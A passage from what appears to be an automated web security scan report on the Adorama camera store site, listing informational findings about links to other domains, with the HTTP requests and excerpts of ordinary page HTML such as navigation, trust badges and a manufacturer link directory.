...[SNIP]...
<div id="footerSocialStrip">
<a href="http://twitter.com/adorama" class="followTwiter" target="blank">Follow us on twitter</a>
<a href="http://www.facebook.com/Adorama" class="followFacebook" target="blank">Become a fan</a>
<a href="http://www.youtube.com/user/adoramaTV" class="followYouTube" target="blank">Whatch us on you tube</a>
...[SNIP]...

5.3. http://www.adorama.com/catalog.tpl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /catalog.tpl

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /catalog.tpl?addtocart=ICA1DM4&src=details HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Expires: Sun, 26 Dec 2010 04:33:12 GMT
Mime-Version: 1.0
Content-Type: text/html
Date: Sun, 26 Dec 2010 04:33:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: sid3=20101225230855189ky; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/
Set-Cookie: ABFlag=89; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/;
Set-Cookie: sweeps=T;
Content-Length: 62413

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
                   
                   
                                       
...[SNIP]...
<link rel="canonical" href="http://www.adorama.com/"/>
<script type="text/javascript" src="http://code.jquery.com/jquery-1.4.3.min.js"></script>
...[SNIP]...
</a><a href="http://www.adoramapix.com/?sid=20101225230855189ky" id="pix" onClick="_gaq.push(['_trackEvent', 'banner', 'TopPix']);"><img src="/artworks2/topnav_pix.gif" alt="Visit AdoramaPix for online photo sharing and digital photo printing create harcover photo books">
...[SNIP]...
<li>
           <a id="pixInNav" href="http://www.adoramapix.com?sid=20101225230855189ky">Professional Prints</a>
...[SNIP]...
<div><a href="http://www.adoramapix.com?sid=20101225230855189ky">Order Prints Online</a>
...[SNIP]...
<div><a href="http://www.adoramapix.com/products/photo-books?sid=20101225230855189ky"><strong>
...[SNIP]...
<li><a href="http://www.adoramarentals.com/" target="_blank">Rental Department </a>
...[SNIP]...
<li><a href="http://www.cellstores.com/mobile/?r=adorama" target="_blank">Wireless Phones & Plans </a>
...[SNIP]...
<br>
<a target="_blank" href="//www.scanalert.com/RatingVerify?ref=www.adorama.com" onClick="_gaq.push(['_trackEvent', 'banner', 'ScanAlert']);"><img width="94" height="54" border="0" src="//images.scanalert.com/meter/www.adorama.com/23.gif" alt="HACKER SAFE certified sites prevent over 99.9% of hacker crime." oncontextmenu="alert('Copying Prohibited by Law - HACKER SAFE is a Trademark of ScanAlert'); return false;"></a><br><br>
<a href="http://www.bbbonline.org/cks.asp?id=121000109" target="_blank" rel="nofollow"><img src="/artworks2/bbbseal3.gif" border="0" alt="BBB Logo">
...[SNIP]...
<!-- BEGIN: BizRate Medal (125x73 pixels) -->
<a href="http://www.bizrate.com/ratings_guide/cust_reviews__mid--22495.html" target="_blank">
<img src="//medals.bizrate.com/medals/dynamic/22495_medal.gif" alt="BizRate Customer Certified (GOLD) Site - Adorama Reviews at Bizrate" width="125" height="73" align="top" border="0" ></a>
...[SNIP]...
<li class="footerCategoryHead pixCategory"><a href="http://www.adoramapix.com/">AdoramaPix</a>
...[SNIP]...
<li><a href="http://www.adoramapix.com/products/prints">Digital Prints</a>
...[SNIP]...
<li><a href="http://www.adoramapix.com/products/photo-books">Photo Books</a>
...[SNIP]...
<div id="footerSocialStrip">
<a href="http://twitter.com/adorama" class="followTwiter" target="blank">Follow us on twitter</a>
<a href="http://www.facebook.com/Adorama" class="followFacebook" target="blank">Become a fan</a>
<a href="http://www.youtube.com/user/adoramaTV" class="followYouTube" target="blank">Whatch us on you tube</a>
...[SNIP]...

5.4. http://www.adorama.com/catalog.tpl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /catalog.tpl

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /catalog.tpl?op=print_details&sku=ICA1DM4 HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Expires: Sun, 26 Dec 2010 04:31:34 GMT
Mime-Version: 1.0
Content-Type: text/html
Date: Sun, 26 Dec 2010 04:31:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: sid3=20101225230855189ky; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/
Set-Cookie: ABFlag=89; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/
Content-Length: 70381

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


               
...[SNIP]...
<font color="#CC0000"><a href='https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&byhref=1&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2/liveperson' target='chat12511569' onClick="javascript:window.open('https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2&referrer='+escape(document.location),'chat12511569','width=472,height=320');return false;" ><img src='https://server.iad.liveperson.net/hc/12511569/?cmd=repstate&site=12511569&channel=web&&ver=1&imageUrl=https://www.adorama.com/artworks2/liveperson&skill=Adorama%20Camera%20Sales/costumer%20service' name='hcIcon' border=0></a>
...[SNIP]...
</script>
<a href="http://www.addthis.com/bookmark.php" onmouseover="return addthis_open(this, '', addUrl, addTitle)" onmouseout="addthis_close()" onclick="return addthis_sendto()"><img src="http://s9.addthis.com/button1-addthis.gif" width="125" height="16" border="0" alt="" /></a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</p>
       
       
       <script src="http://content.webcollage.net/adorama/smart-button"></script>
...[SNIP]...
<p>
                   <a href="http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICA1DM4" onClick="window.open('http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICA1DM4', 'popup','width=500,height=400,resizable=1');return false;" target="new"><img src="artworks2/Product_Tour.gif" width="117" height="23" border="0" />
...[SNIP]...

5.5. http://www.adorama.com/catalog.tpl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /catalog.tpl

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /catalog.tpl?op=itemlist&cat1=Cameras%20%26%20Lenses&cat2=Digital%20Cameras%20%26%20Accessories&cat3=Digital%20Cameras&feature1=Canon HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Expires: Sun, 26 Dec 2010 04:31:37 GMT
Mime-Version: 1.0
Content-Type: text/html
Date: Sun, 26 Dec 2010 04:31:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: sweeps=T
Set-Cookie: sid3=20101225230855189ky; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/
Set-Cookie: il_image_view=yes; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/
Set-Cookie: ABFlag=89; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/
Content-Length: 196688

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


               
...[SNIP]...
</a><a href="http://www.adoramapix.com/?sid=20101225230855189ky" id="pix" onClick="_gaq.push(['_trackEvent', 'banner', 'TopPix']);"><img src="/artworks2/topnav_pix.gif" alt="Visit AdoramaPix for online photo sharing and digital photo printing create harcover photo books">
...[SNIP]...
<li>
           <a id="pixInNav" href="http://www.adoramapix.com?sid=20101225230855189ky">Professional Prints</a>
...[SNIP]...
<div><a href="http://www.adoramapix.com?sid=20101225230855189ky">Order Prints Online</a>
...[SNIP]...
<div><a href="http://www.adoramapix.com/products/photo-books?sid=20101225230855189ky"><strong>
...[SNIP]...
<li><a href="http://www.adoramarentals.com/" target="_blank">Rental Department </a>
...[SNIP]...
<li><a href="http://www.cellstores.com/mobile/?r=adorama" target="_blank">Wireless Phones & Plans </a>
...[SNIP]...
<br>
<a target="_blank" href="//www.scanalert.com/RatingVerify?ref=www.adorama.com" onClick="_gaq.push(['_trackEvent', 'banner', 'ScanAlert']);"><img width="94" height="54" border="0" src="//images.scanalert.com/meter/www.adorama.com/23.gif" alt="HACKER SAFE certified sites prevent over 99.9% of hacker crime." oncontextmenu="alert('Copying Prohibited by Law - HACKER SAFE is a Trademark of ScanAlert'); return false;"></a><br><br>
<a href="http://www.bbbonline.org/cks.asp?id=121000109" target="_blank" rel="nofollow"><img src="/artworks2/bbbseal3.gif" border="0" alt="BBB Logo">
...[SNIP]...
<!-- BEGIN: BizRate Medal (125x73 pixels) -->
<a href="http://www.bizrate.com/ratings_guide/cust_reviews__mid--22495.html" target="_blank">
<img src="//medals.bizrate.com/medals/dynamic/22495_medal.gif" alt="BizRate Customer Certified (GOLD) Site - Adorama Reviews at Bizrate" width="125" height="73" align="top" border="0" ></a>
...[SNIP]...
<br><a href="http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICA1DM3R" onClick="window.open('http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICA1DM3R', 'popup','width=500,height=400,resizable=1');return false;" target="new"><img src="artworks2/Product_Tour.gif" border="0" >
...[SNIP]...
<br><a href="http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICA5DM2" onClick="window.open('http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICA5DM2', 'popup','width=500,height=400,resizable=1');return false;" target="new"><img src="artworks2/Product_Tour.gif" border="0" >
...[SNIP]...
<br><a href="http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICA5DM2L13" onClick="window.open('http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICA5DM2L13', 'popup','width=500,height=400,resizable=1');return false;" target="new"><img src="artworks2/Product_Tour.gif" border="0" >
...[SNIP]...
<br><a href="http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICA5DM2L20" onClick="window.open('http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICA5DM2L20', 'popup','width=500,height=400,resizable=1');return false;" target="new"><img src="artworks2/Product_Tour.gif" border="0" >
...[SNIP]...
<br><a href="http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICA5DM2K" onClick="window.open('http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICA5DM2K', 'popup','width=500,height=400,resizable=1');return false;" target="new"><img src="artworks2/Product_Tour.gif" border="0" >
...[SNIP]...
<li class="footerCategoryHead pixCategory"><a href="http://www.adoramapix.com/">AdoramaPix</a>
...[SNIP]...
<li><a href="http://www.adoramapix.com/products/prints">Digital Prints</a>
...[SNIP]...
<li><a href="http://www.adoramapix.com/products/photo-books">Photo Books</a>
...[SNIP]...
<div id="footerSocialStrip">
<a href="http://twitter.com/adorama" class="followTwiter" target="blank">Follow us on twitter</a>
<a href="http://www.facebook.com/Adorama" class="followFacebook" target="blank">Become a fan</a>
<a href="http://www.youtube.com/user/adoramaTV" class="followYouTube" target="blank">Whatch us on you tube</a>
...[SNIP]...

5.6. http://www.adorama.com/catalog.tpl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /catalog.tpl

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /catalog.tpl?op=Links HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Expires: Sun, 26 Dec 2010 04:31:30 GMT
Mime-Version: 1.0
Content-Type: text/html
Date: Sun, 26 Dec 2010 04:31:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: sweeps=T
Set-Cookie: sid3=20101225230855189ky; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/
Set-Cookie: ABFlag=89; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/
Content-Length: 103666

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


                <head>
...[SNIP]...
</a><a href="http://www.adoramapix.com/?sid=20101225230855189ky" id="pix" onClick="_gaq.push(['_trackEvent', 'banner', 'TopPix']);"><img src="/artworks2/topnav_pix.gif" alt="Visit AdoramaPix for online photo sharing and digital photo printing create harcover photo books">
...[SNIP]...
<li>
           <a id="pixInNav" href="http://www.adoramapix.com?sid=20101225230855189ky">Professional Prints</a>
...[SNIP]...
<div><a href="http://www.adoramapix.com?sid=20101225230855189ky">Order Prints Online</a>
...[SNIP]...
<div><a href="http://www.adoramapix.com/products/photo-books?sid=20101225230855189ky"><strong>
...[SNIP]...
<li><a href="http://www.adoramarentals.com/" target="_blank">Rental Department </a>
...[SNIP]...
<li><a href="http://www.cellstores.com/mobile/?r=adorama" target="_blank">Wireless Phones & Plans </a>
...[SNIP]...
<br>
<a target="_blank" href="//www.scanalert.com/RatingVerify?ref=www.adorama.com" onClick="_gaq.push(['_trackEvent', 'banner', 'ScanAlert']);"><img width="94" height="54" border="0" src="//images.scanalert.com/meter/www.adorama.com/23.gif" alt="HACKER SAFE certified sites prevent over 99.9% of hacker crime." oncontextmenu="alert('Copying Prohibited by Law - HACKER SAFE is a Trademark of ScanAlert'); return false;"></a><br><br>
<a href="http://www.bbbonline.org/cks.asp?id=121000109" target="_blank" rel="nofollow"><img src="/artworks2/bbbseal3.gif" border="0" alt="BBB Logo">
...[SNIP]...
<!-- BEGIN: BizRate Medal (125x73 pixels) -->
<a href="http://www.bizrate.com/ratings_guide/cust_reviews__mid--22495.html" target="_blank">
<img src="//medals.bizrate.com/medals/dynamic/22495_medal.gif" alt="BizRate Customer Certified (GOLD) Site - Adorama Reviews at Bizrate" width="125" height="73" align="top" border="0" ></a>
...[SNIP]...
<li>
           
           
               <a href="http://www.16x9inc.com/" target="_blank">16x9</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.3m.com/" target="_blank">3M</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.asplights.com/" target="_blank">A S P</a>
...[SNIP]...
<li>
           
           
               <a href="http://abtech2.com/" target="_blank">ABT Inc.</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.accele.com/" target="_blank">AcceleVision</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.acratech.net/" target="_blank">Acratech</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.adaptec.com/" target="_blank">Adaptec</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.adobe.com/" target="_blank">Adobe</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.adstech.com/" target="_blank">ADS Tech</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.advantagegrip.com/" target="_blank">Advantage Gripware</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.agfa.com/" target="_blank">Agfa</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.aist.com" target="_blank">AIST</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.akg.com/" target="_blank">AKG Acoustics</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.aleratec.com/" target="_blank">Aleratec</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.alienskin.com/" target="_blank">Alien Skin</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.alpineproducts.com/" target="_blank">Alpine Innovations</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.alzodigital.com/" target="_blank">Alzo</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.americanrecorder.com/" target="_blank">Amabilia</a>
...[SNIP]...
<li>
           
           
               <a href="http://amux.com/" target="_blank">AMC Network</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.amphibico.com/" target="_blank">Amphibico</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.ansmann.de/cms/" target="_blank">Ansmann</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.antonbauer.com/" target="_blank">Anton Bauer</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.norazza.com" target="_blank">Ape Case</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.apple.com/" target="_blank">Apple</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.applied-magic.com/" target="_blank">Applied Magic</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.aquatech.com/" target="_blank">AquaTech</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.aquatica.ca/" target="_blank">Aquatica</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.shoparchos.com/" target="_blank">Archos</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.aristogrid.com/" target="_blank">Aristo</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.arri.com/" target="_blank">Arri</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.audio-technica.com/" target="_blank">Audio-Technica</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.audiovox.com/" target="_blank">Audiovox</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.bogenimaging.us/jsp/index.jsp" target="_blank">Avenger</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.avid.com/" target="_blank">Avid</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.azdencorp.com/video.html" target="_blank">Azden</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.schneideroptics.com/filters/filters.htm" target="_blank">B + W</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.barska.com/" target="_blank">Barska</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.beachtek.com/" target="_blank">BeachTek</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.intenscreen.com/" target="_blank">Beattie</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.bebob.de/" target="_blank">Bebob Engineering</a>
...[SNIP]...
<li>
           
           
               <a href="http://world.belkin.com/" target="_blank">Belkin</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.bella-usa.com/" target="_blank">Bella</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.patersonphotographic.com/" target="_blank">Benbo</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.bencher.com/cameraequip.html" target="_blank">Bencher</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.omegasatter.com/v2/products/displaybrand.cfm?BrandID=4" target="_blank">Berg</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.bergger.com/" target="_blank">Bergger</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.berlebach.de/e_index.php" target="_blank">Berlebach</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.bescor.com/catalog.php" target="_blank">Bescor</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.beseler-photo.com/" target="_blank">Beseler</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.bestwelloptical.com/" target="_blank">Bestwell Optical</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.billingham.co.uk/" target="_blank">Billingham</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.blackcatphotoproducts.com/" target="_blank">Black Cat</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.bluecranedigital.com/" target="_blank">Blue Crane</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.bogenimaging.us/" target="_blank">Bogen Imaging</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.bonicadive.com/" target="_blank">Bonica</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.borisfx.com/" target="_blank">Boris FX</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.bowensinternational.com/" target="_blank">Bowens</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.bowensusa.com/" target="_blank">Bowens USA</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.bowerusa.com/" target="_blank">Bower</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.boxlight.com/" target="_blank">Boxlight</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.braun-phototechnik.de/" target="_blank">Braun</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.brother.com/" target="_blank">Brother</a>
...[SNIP]...
<li>
           
           
               <a href="http://browningsportsoptics.com/" target="_blank">Browning</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.buffalotech.com/" target="_blank">Buffalo Technology</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.bushnell.com/" target="_blank">Bushnell</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.calibergps.com/" target="_blank">Caliber</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.sunbounce.com/" target="_blank">California Sunbounce</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.cambo.com" target="_blank">Cambo</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.camerarmor.com/" target="_blank">Camera Armor</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.camerabright.com/" target="_blank">CameraBright</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.usa.canon.com/html/canonindex.html" target="_blank">Canon</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.canopus.com/" target="_blank">Canopus</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.cartoni.com/" target="_blank">Cartoni</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.caselogic.com/" target="_blank">Case Logic</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.casio.com/" target="_blank">Casio</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.cavision.com/" target="_blank">Cavision</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.celestron.com/" target="_blank">Celestron</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.schneideroptics.com/" target="_blank">Century Optics</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.channelplus.com/" target="_blank">Channel Plus</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.chiefmfg.com/" target="_blank">Chief</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.chimeralighting.com/index.cfm" target="_blank">Chimera</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.steadicam.com/" target="_blank">Cinema Products</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.comprehensiveinc.com/" target="_blank">CitiDisk</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.clearfile.com/" target="_blank">Clear-File</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.clipperproducts.com/" target="_blank">Clipper Products</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.clouddome.com/" target="_blank">Cloud Dome</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.cobyusa.com/_en/" target="_blank">Coby</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.cognitech.com/" target="_blank">Cognitech</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.cokin.co.uk/" target="_blank">Cokin</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.studiostyle.com/" target="_blank">Collector's Gallery</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.studiostyle.com/" target="_blank">Collectors Gallery</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.colorvision.com/" target="_blank">ColorVision</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.comet-usa.com/CBm1200.html" target="_blank">Comet</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.comprehensiveinc.com/" target="_blank">Comprehensive Video</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.contaxusa.com/" target="_blank">Contax</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.contourdesign.com/" target="_blank">Contour Design</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.cool-lux.com/Merchant2/merchant.mvc" target="_blank">Cool-Lux</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.corel.com/" target="_blank">Corel</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.coronadofilters.com/index.html" target="_blank">Coronado</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.cottagemills.com/" target="_blank">Cottage Mills</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.creative.com/" target="_blank">Creative Labs</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.crumplerbags.com/home.php" target="_blank">Crumpler</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.ctadigital.com/" target="_blank">CTA Digital</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.cullmann-foto.de/en/" target="_blank">Cullmann</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.custombrackets.com/Scripts/default.asp" target="_blank">Custom Brackets</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.d-skin.com/" target="_blank">D-Skin</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.da-lite.com/" target="_blank">Da-Lite</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.dahle.com/" target="_blank">Dahle</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.dane-elec.com/" target="_blank">Dane-Elec Memory</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.datavideo-tek.com/" target="_blank">Datavideo</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.tiffen.com/products.html?tablename=davissanford" target="_blank">Davis & Sanford</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.dazzle.com" target="_blank">Dazzle</a>
...[SNIP]...
<li>
           
           
               <a href="http://dedolight.com/" target="_blank">Dedolight</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.delkin.com/" target="_blank">Delkin</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.delsey.com/" target="_blank">Delsey</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.dennisdaniels.com/" target="_blank">Dennis Daniels</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.pxlsoft.com/" target="_blank">Dg Foto Art</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.digipowersolutions.com/store/index.php" target="_blank">Digipower</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.digitalcamerabattery.com/" target="_blank">Digital Camera Battery</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.digitalfoci.com/" target="_blank">Digital Foci</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.digitaljuice.com/" target="_blank">Digital Juice</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.digitalorigin.com/" target="_blank">Digital Origin</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.dsicentral.com/" target="_blank">Digital Spectrum</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.discmakers.com/" target="_blank">Disc Makers</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.tiffen.com/domkecat01.htm" target="_blank">Domke</a>
...[SNIP]...
